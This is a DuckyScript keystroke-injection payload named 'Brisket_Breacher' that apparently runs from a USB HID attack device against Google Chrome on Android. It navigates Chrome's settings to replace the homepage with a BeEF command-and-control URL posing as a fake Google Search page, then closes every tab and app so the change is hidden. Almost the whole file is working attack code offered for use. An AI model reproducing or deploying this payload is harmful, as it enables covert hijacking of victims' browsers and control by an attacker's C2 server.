1
REM TITLE: Brisket_Breacher
2
REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)
3
REM TARGET OS: Android mobile device/Google Chrome (tested on Samsung S24 FE | One UI V7.0 | Android V15)
4
REM DESCRIPTION: Brisket_Breacher is DuckyScript payload that targets the Android mobile device Google Chrome browser utilizing the Browser Exploitation Framework (BeEF). It replaces the homepage of the browser with a malicious Google Search imitation homepage that connects to a control and command server, allowing the attacker to have control over the browser. See README.md
5
REM REQUIREMENTS: See README.md
6

7
DEFINE #BeEF_URL https://BeEF_C2_URL
8

9
REM Begin attack:
10
ATTACKMODE HID
11
DELAY 1000
12

13
REM Opening Google Chrome:
14
GUI f
15
DELAY 400
16
STRINGLN chrome
17
DELAY 200
18
ENTER
19
DELAY 500
20

21
REM Opening new tab to ensure proper default Chrome environment to execute payload properly:
22
CTRL t
23
DELAY 300
24
SHIFT TAB
25
DELAY 200
26
ENTER
27
DELAY 350
28

29
REM Navigating to Homepage settings:
30
REPEAT 11 DOWNARROW
31
ENTER
32
DELAY 350
33
REPEAT 10 DOWNARROW
34
ENTER
35

36
REM Setting BeEF C2 URL as default homepage:
37
DELAY 250
38
REPEAT 4 TAB
39
DELAY 250
40
CTRL a
41
DELAY 250
42
STRINGLN #BeEF_URL
43
DELAY 250
44

45
REM Navigating back to original homepage and accessing tabs menu:
46
ESC
47
DELAY 100
48
ESC
49
DELAY 250
50
SHIFT TAB
51
DELAY 250
52
DOWNARROW
53
DELAY 100
54
UPARROW
55
DELAY 300
56
ENTER
57

58
REM Closing all tabs:
59
DELAY 350
60
REPEAT 4 TAB
61
DELAY 350
62
ENTER
63
DELAY 350
64
REPEAT 2 DOWNARROW
65
DELAY 250
66
ENTER
67
DELAY 350
68
TAB
69
DELAY 100
70
TAB
71
DELAY 100
72
ENTER
73
DELAY 200
74

75
REM Closing applications (including browser) and returning to home screen:
76
INJECT_MOD
77
GUI TAB
78
DELAY 300
79
REPEAT 2 DOWNARROW
80
DELAY 150
81
ENTER
82

83